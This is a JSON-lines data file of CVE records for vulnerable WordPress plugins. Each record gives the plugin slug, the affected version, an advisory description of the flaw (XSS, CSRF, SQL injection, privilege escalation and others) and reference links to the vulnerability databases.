{"CVE_ID":"CVE-2023-0175","slug":"smart-logo-showcase-lite","versionImpact":"1.1.9","description":"The Responsive Clients Logo Gallery Plugin for WordPress plugin through 1.1.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cdcd3c2c-cb29-4b21-8d3d-7eafbc1d3098\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cdcd3c2c-cb29-4b21-8d3d-7eafbc1d3098\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2608","slug":"multiple-pages-generator-by-porthas","versionImpact":"3.3.17","description":"The Multiple Page Generator Plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to time-based SQL Injection via the orderby and order parameters in versions up to, and including, 3.3.17 due to missing nonce verification on the projects_list function and insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries leading to resource exhaustion via a forged request granted they can trick an administrator into performing an action such as clicking on a link. Version 3.3.18 addresses the SQL Injection, which drastically reduced the severity.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910686%40multiple-pages-generator-by-porthas%2Ftrunk&old=2905353%40multiple-pages-generator-by-porthas%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910686%40multiple-pages-generator-by-porthas%2Ftrunk&old=2905353%40multiple-pages-generator-by-porthas%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912909%40multiple-pages-generator-by-porthas&new=2912909%40multiple-pages-generator-by-porthas&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912909%40multiple-pages-generator-by-porthas&new=2912909%40multiple-pages-generator-by-porthas&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d900584c-0f58-4abc-92ff-841f898d02fc?source=cve\",\"name\":\"https:\
\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d900584c-0f58-4abc-92ff-841f898d02fc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/ProjectsListManage.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/ProjectsListManage.php#L40\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1978","slug":"shiftcontroller","versionImpact":"4.9.25","description":"The ShiftController Employee Shift Scheduling plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the query string in versions up to, and including, 4.9.25 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5c61212-e68e-4198-b078-18121576b767?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5c61212-e68e-4198-b078-18121576b767?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2898274\\\/shiftcontroller\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2898274\\\/shiftcontroller\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3092","slug":"smtp-mail","versionImpact":"1.2.16","description":"The SMTP Mail plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 1.2.16 due to insufficient input sanitization and output escaping when the 'Save Data SendMail' feature is enabled. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-mail\\\/trunk\\\/includes\\\/data-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-mail\\\/trunk\\\/includes\\\/data-list-table.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ae734d1-0cd4-4ff5-8448-828b0fb64f70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ae734d1-0cd4-4ff5-8448-828b0fb64f70?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0768","slug":"envo-elementor-for-woocommerce","versionImpact":"1.4.4","description":"The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 1.4.4. This is due to missing or incorrect nonce validation on the ajax_theme_activation function. This makes it possible for unauthenticated attackers to activate arbitrary installed themes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php#L367\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php#L367\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1293","slug":"brizy","versionImpact":"2.4.40","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the embedded media custom block in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57dac6de-545f-49e5-9f45-d90a48d6b05f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57dac6de-545f-49e5-9f45-d90a48d6b05f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2960","slug":"svs-pricing-tables","versionImpact":"1.0.4","description":"The SVS Pricing Tables plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the deletePricingTable() function. This makes it possible for unauthenticated attackers to delete pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7a24213-5191-4b6d-a2d1-7b79729e6517?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7a24213-5191-4b6d-a2d1-7b79729e6517?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L91\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5342","slug":"simple-image-popup-shortcode","versionImpact":"1.0","description":"The Simple Image Popup Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sips_popup' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11fb823c-c3d3-456d-b606-b01a8307c25a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11fb823c-c3d3-456d-b606-b01a8307c25a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-image-popup-shortcode\\\/trunk\\\/sips-popup.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-image-popup-shortcode\\\/trunk\\\/sips-popup.php#L27\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6010","slug":"cost-calculator-builder-pro","versionImpact":"3.1.96","description":"The Cost Calculator Builder PRO plugin for WordPress is vulnerable to price manipulation in all versions up to, and including, 3.1.96. This is due to the plugin allowing the price field to be manipulated prior to processing via the 'create_cc_order' function, called from the Cost Calculator Builder plugin. This makes it possible for unauthenticated attackers to manipulate the price of orders submitted via the calculator. Note: this vulnerability was partially patched with the release of Cost Calculator Builder version 3.2.17.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc04e676-e394-488e-a239-95af5f865613?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc04e676-e394-488e-a239-95af5f865613?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/frontend\\\/dist\\\/order.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/frontend\\\/dist\\\/order.js\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8989","slug":"stars-testimonials-with-slider-and-masonry-grid","versionImpact":"3.3.1","description":"The Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews \u2013 Stars Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's stars_testimonials shortcode in all versions up to, and including, 3.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b406f0b8-16b5-49ca-88d8-7717bef1ae61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b406f0b8-16b5-49ca-88d8-7717bef1ae61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/trunk\\\/plugin.class.php#L1281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/trunk\\\/plugin.class.php#L1281\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stars-testimonials-with-slider-and-masonry-grid\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stars-testimonials-with-slider-and-masonry-grid\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159818\\\/#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159818\\\/#file8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159818\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159818\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10055","slug":"support-chat","versionImpact":"2.3.3","description":"The Click to Chat \u2013 WP Support All-in-One Floating Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpsaio_snapchat shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4c13600-0791-4ade-9c28-f43f164aedae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4c13600-0791-4ade-9c28-f43f164aedae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/support-chat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/support-chat\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169768\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169768\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10709","slug":"wp-yadisk-files","versionImpact":"1.2.5","description":"The YaDisk Files WordPress plugin through 1.2.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/114aeaf7-32a5-4510-a497-92cc0951b022\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/114aeaf7-32a5-4510-a497-92cc0951b022\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11386","slug":"gatormail-smart-forms","versionImpact":"1.1.0","description":"The GatorMail SmartForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gatormailsmartform' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gatormail-smart-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gatormail-smart-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c96e5939-5b6d-4cf2-83eb-a7b94f032bcb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c96e5939-5b6d-4cf2-83eb-a7b94f032bcb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13558","slug":"woo-rfq-for-woocommerce","versionImpact":"1.9.179","description":"The NP Quote Request for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.9.179 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to read the content of quote requests.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256816\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256816\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-rfq-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-rfq-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5991c86b-6785-41a6-a5df-c65e8a28201c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5991c86b-6785-41a6-a5df-c65e8a28201c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4591","slug":"weluka-lite","versionImpact":"1.0.3","description":"The Weluka Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'weluka-map' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weluka-lite\\\/trunk\\\/class-weluka-builder.php#L4666\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weluka-lite\\\/trunk\\\/class-weluka-builder.php#L4666\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21a12b4-2f9d-4ae3-a5f6-1ba90fab43a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21a12b4-2f9d-4ae3-a5f6-1ba90fab43a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5559","slug":"timezonecalculator","versionImpact":"3.37","description":"The TimeZoneCalculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'timezonecalculator_output' shortcode in all versions up to, and including, 3.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/timezonecalculator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/timezonecalculator\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e1a9ab-9ba9-45ff-aecd-b8953abc653a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e1a9ab-9ba9-45ff-aecd-b8953abc653a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7695","slug":"integration-cds","versionImpact":"2.81","description":"The Dataverse Integration plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization checks within its reset_password_link REST endpoint in versions 2.77 through 2.81. The endpoint\u2019s handler accepts a client-supplied id, email, or login, looks up that user, and calls get_password_reset_key() unconditionally. Because it only checks that the caller is authenticated, and not that they own or may edit the target account, any authenticated attacker, with Subscriber-level access and above, can obtain a password reset link for an administrator and hijack that account.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-cds\\\/trunk\\\/src\\\/API\\\/AuthenticatedEndpoint.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-cds\\\/trunk\\\/src\\\/API\\\/AuthenticatedEndpoint.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-cds\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/GetResetUserPasswordLink.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-cds\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/GetResetUserPasswordLink.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3329717%40integration-cds%2Ftrunk&old=3323579%40integration-cds%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3329717%40integration-cds%2Ftrunk&old=3323579%40integration-cds%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-cds\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-cds\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd35a3c-7203-4832-8b0d-56f3e7983118?source=cve\",
\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd35a3c-7203-4832-8b0d-56f3e7983118?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0167","slug":"getresponse-integration","versionImpact":"5.5.31","description":"The GetResponse for WordPress plugin through 5.5.31 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fafbf666-b908-48ef-9041-fea653e9bfeb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fafbf666-b908-48ef-9041-fea653e9bfeb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2528","slug":" contact-form-by-supsystic","versionImpact":"1.7.24","description":"The Contact Form by Supsystic plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.24. This is due to missing or incorrect nonce validation on the AJAX action handler. This makes it possible for unauthenticated attackers to execute AJAX actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c387b07-baf6-4c62-943e-4bd121160ceb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c387b07-baf6-4c62-943e-4bd121160ceb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/trunk\\\/classes\\\/frame.php?rev=2912584#L230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/trunk\\\/classes\\\/frame.php?rev=2912584#L230\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/trunk\\\/classes\\\/frame.php?rev=2777737#L297\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/trunk\\\/classes\\\/frame.php?rev=2777737#L297\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1917","slug":"powerpress","versionImpact":"10.0","description":"The PowerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions up to, and including, 10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: A partial fix for the issue was introduced in version 10.0.1, and an additional patch (version 10.0.2) was released to address a workaround.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2896729\\\/powerpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2896729\\\/powerpress\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44583cb7-bc32-4e62-8431-f5f1f6baeff2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44583cb7-bc32-4e62-8431-f5f1f6baeff2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/trunk\\\/powerpress-player.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/trunk\\\/powerpress-player.php#L102\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2899207\\\/powerpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2899207\\\/powerpress\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3088","slug":"wp-mail-log","versionImpact":"1.1.1","description":"The WP Mail Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email contents in versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86ee1acb-6f0c-40e6-80a0-fc93b61c1602?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86ee1acb-6f0c-40e6-80a0-fc93b61c1602?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2931706\\\/wp-mail-log\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2931706\\\/wp-mail-log\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5233","slug":"font-awesome-integration","versionImpact":"5.0","description":"The Font Awesome Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'fawesome' shortcode in versions up to, and including, 5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2791f48-895f-4099-87ec-41aaac2494a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2791f48-895f-4099-87ec-41aaac2494a2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-integration\\\/tags\\\/5.0\\\/font-awesome-integration.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-integration\\\/tags\\\/5.0\\\/font-awesome-integration.php#L48\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35911","slug":"contact-form-generator","versionImpact":"2.6.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Creative Solutions Contact Form Generator : Creative form builder for WordPress allows SQL Injection.This issue affects Contact Form Generator : Creative form builder for WordPress: from n\/a through 2.6.0.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-generator\\\/wordpress-contact-form-generator-plugin-2-6-0-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-generator\\\/wordpress-contact-form-generator-plugin-2-6-0-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
